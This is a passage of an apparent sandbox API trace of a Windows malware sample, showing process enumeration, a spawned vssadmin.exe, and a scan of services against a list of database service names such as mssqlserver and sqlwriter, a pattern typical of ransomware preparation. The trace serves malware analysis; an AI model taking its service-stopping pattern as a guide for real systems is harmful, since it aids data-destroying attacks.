hSnapshot=0x514, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x680, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0172.628] lstrlenW (lpString="svchost.exe") returned 11 [0172.628] Process32NextW (in: hSnapshot=0x514, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x4b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0172.629] lstrlenW (lpString="audiodg.exe") returned 11 [0172.629] Process32NextW (in: hSnapshot=0x514, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x714, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0172.630] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0172.630] Process32NextW (in: hSnapshot=0x514, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x754, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0172.631] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0172.631] Process32NextW (in: hSnapshot=0x514, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0172.644] lstrlenW (lpString="Memory Compression") returned 18 [0172.645] Process32NextW (in: hSnapshot=0x514, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x854, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0172.645] lstrlenW (lpString="sihost.exe") returned 10 [0172.645] Process32NextW (in: hSnapshot=0x514, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0172.646] lstrlenW (lpString="svchost.exe") returned 11 [0172.646] Process32NextW (in: hSnapshot=0x514, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3bc, pcPriClassBase=6, dwFlags=0x0, szExeFile="msoia.exe")) returned 1 [0172.647] lstrlenW (lpString="msoia.exe") returned 9 [0172.647] Process32NextW (in: hSnapshot=0x514, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0172.648] lstrlenW (lpString="taskhostw.exe") returned 13 [0172.648] Process32NextW (in: hSnapshot=0x514, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3f, th32ParentProcessID=0x9c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0172.649] lstrlenW (lpString="explorer.exe") returned 12 [0172.649] Process32NextW (in: hSnapshot=0x514, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0172.650] lstrlenW (lpString="SearchUI.exe") returned 12 [0172.650] Process32NextW (in: hSnapshot=0x514, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0172.651] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0172.651] Process32NextW (in: hSnapshot=0x514, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0172.652] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0172.652] Process32NextW (in: hSnapshot=0x514, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xca0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0172.653] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0172.653] Process32NextW (in: hSnapshot=0x514, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x9d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hgaibc.exe")) returned 1 [0172.653] lstrlenW (lpString="hgaibc.exe") returned 10 [0172.653] Process32NextW (in: hSnapshot=0x514, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xe24, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0172.654] lstrlenW (lpString="cmd.exe") returned 7 [0172.654] Process32NextW (in: hSnapshot=0x514, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xe40, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0172.655] lstrlenW (lpString="conhost.exe") returned 11 [0172.655] Process32NextW (in: hSnapshot=0x514, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xefc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x3bc, pcPriClassBase=13, dwFlags=0x0, szExeFile="consent.exe")) returned 1 [0172.656] lstrlenW (lpString="consent.exe") returned 11 [0172.656] Process32NextW (in: hSnapshot=0x514, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0172.657] lstrlenW (lpString="dllhost.exe") returned 11 [0172.657] Process32NextW (in: hSnapshot=0x514, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xe40, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0172.658] lstrlenW (lpString="vssadmin.exe") returned 12 [0172.658] Process32NextW (in: hSnapshot=0x514, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xe40, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 0 [0172.659] CloseHandle (hObject=0x514) returned 1 [0172.659] Sleep (dwMilliseconds=0x1f4) [0173.284] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x458c498 [0173.285] EnumServicesStatusExW (in: hSCManager=0x458c498, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x252ff3c, lpServicesReturned=0x252ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x252ff3c, lpServicesReturned=0x252ff54, lpResumeHandle=0x0) returned 0 [0173.285] GetLastError () returned 0xea [0173.285] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c30) returned 0x46a4f50 [0173.285] EnumServicesStatusExW (in: hSCManager=0x458c498, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x46a4f50, cbBufSize=0x1c30, pcbBytesNeeded=0x252ff3c, lpServicesReturned=0x252ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x46a4f50, pcbBytesNeeded=0x252ff3c, lpServicesReturned=0x252ff54, lpResumeHandle=0x0) returned 1 [0173.286] CloseServiceHandle (hSCObject=0x458c498) returned 1 [0173.286] lstrlenW (lpString="Appinfo") returned 7 [0173.286] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0173.286] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0173.286] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0173.286] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0173.286] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0173.286] lstrlenW (lpString="AppXSvc") returned 7 [0173.286] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0173.286] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0173.286] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0173.287] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0173.287] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0173.287] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0173.287] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0173.287] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0173.287] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0173.287] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0173.287] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0173.287] lstrlenW (lpString="Audiosrv") returned 8 [0173.287] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0173.287] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0173.287] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0173.287] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0173.287] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0173.287] lstrlenW (lpString="BFE") returned 3 [0173.287] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0173.287] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0173.287] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0173.287] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0173.287] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0173.287] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0173.287] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0173.287] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0173.287] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0173.287] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0173.288] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0173.288] lstrlenW (lpString="CDPSvc") returned 6 [0173.288] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0173.288] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0173.288] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0173.288] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0173.288] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0173.288] lstrlenW (lpString="ClickToRunSvc") returned 13 [0173.288] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0173.288] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0173.288] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0173.288] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0173.288] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0173.288] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0173.288] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0173.288] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0173.288] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0173.288] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0173.288] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0173.288] lstrlenW (lpString="CryptSvc") returned 8 [0173.288] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0173.288] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0173.288] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0173.288] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0173.288] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0173.288] lstrlenW (lpString="DcomLaunch") returned 10 [0173.289] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0173.289] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0173.289] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0173.289] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0173.289] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0173.289] lstrlenW (lpString="DeviceAssociationService") returned 24 [0173.289] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0173.289] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0173.289] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0173.289] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0173.289] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0173.289] lstrlenW (lpString="Dhcp") returned 4 [0173.289] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0173.289] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0173.289] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0173.289] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0173.289] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0173.289] lstrlenW (lpString="Dnscache") returned 8 [0173.289] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0173.289] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0173.289] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0173.289] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0173.289] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0173.289] lstrlenW (lpString="DPS") returned 3 [0173.289] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0173.289] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0173.289] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0173.289] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0173.290] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0173.290] lstrlenW (lpString="DusmSvc") returned 7 [0173.290] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0173.290] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0173.290] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0173.290] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0173.290] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0173.290] lstrlenW (lpString="EventLog") returned 8 [0173.290] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0173.290] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0173.290] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0173.290] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0173.290] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0173.290] lstrlenW (lpString="EventSystem") returned 11 [0173.290] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0173.290] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0173.290] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0173.290] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0173.290] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0173.290] lstrlenW (lpString="FontCache") returned 9 [0173.290] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0173.290] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0173.290] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0173.290] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0173.290] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0173.290] lstrlenW (lpString="gpsvc") returned 5 [0173.290] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0173.290] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0173.290] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0173.291] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0173.291] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0173.291] lstrlenW (lpString="iphlpsvc") returned 8 [0173.291] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0173.291] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0173.291] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0173.291] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0173.291] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0173.291] lstrlenW (lpString="KeyIso") returned 6 [0173.291] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0173.291] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0173.291] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0173.291] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0173.291] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0173.291] lstrlenW (lpString="LanmanServer") returned 12 [0173.291] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0173.291] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0173.291] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0173.291] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0173.291] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0173.291] lstrlenW (lpString="LanmanWorkstation") returned 17 [0173.291] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0173.291] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0173.291] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0173.291] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0173.291] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0173.291] lstrlenW (lpString="lfsvc") returned 5 [0173.291] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0173.291] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0173.292] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0173.292] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0173.292] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0173.292] lstrlenW (lpString="lmhosts") returned 7 [0173.292] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0173.292] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0173.292] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0173.292] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0173.292] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0173.292] lstrlenW (lpString="LSM") returned 3 [0173.292] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0173.292] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0173.292] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0173.292] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0173.292] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0173.292] lstrlenW (lpString="MpsSvc") returned 6 [0173.292] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0173.292] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0173.292] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0173.292] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0173.292] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0173.292] lstrlenW (lpString="NcbService") returned 10 [0173.292] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0173.292] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0173.292] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0173.292] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0173.292] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0173.350] lstrlenW (lpString="netprofm") returned 8 [0173.350] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0173.350] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0173.350] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0173.350] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0173.350] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0173.350] lstrlenW (lpString="NgcSvc") returned 6 [0173.350] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NgcSvc") returned -1 [0173.350] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NgcSvc") returned -1 [0173.350] lstrcmpiW (lpString1="sqlwriter", lpString2="NgcSvc") returned 1 [0173.351] lstrcmpiW (lpString1="mssqlserver", lpString2="NgcSvc") returned -1 [0173.351] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NgcSvc") returned 1 [0173.351] lstrlenW (lpString="NlaSvc") returned 6 [0173.351] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0173.351] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0173.351] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0173.351] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0173.351] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0173.351] lstrlenW (lpString="nsi") returned 3 [0173.351] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0173.351] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0173.351] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0173.351] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0173.351] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0173.351] lstrlenW (lpString="PcaSvc") returned 6 [0173.351] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0173.351] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0173.351] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0173.351] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0173.351] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0173.351] lstrlenW (lpString="PlugPlay") returned 8 [0173.351] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0173.351] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0173.351] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0173.352] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0173.352] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0173.352] lstrlenW (lpString="Power") returned 5 [0173.352] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0173.352] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0173.352] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0173.352] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0173.352] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0173.352] lstrlenW (lpString="ProfSvc") returned 7 [0173.352] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0173.352] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0173.352] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0173.352] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0173.352] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 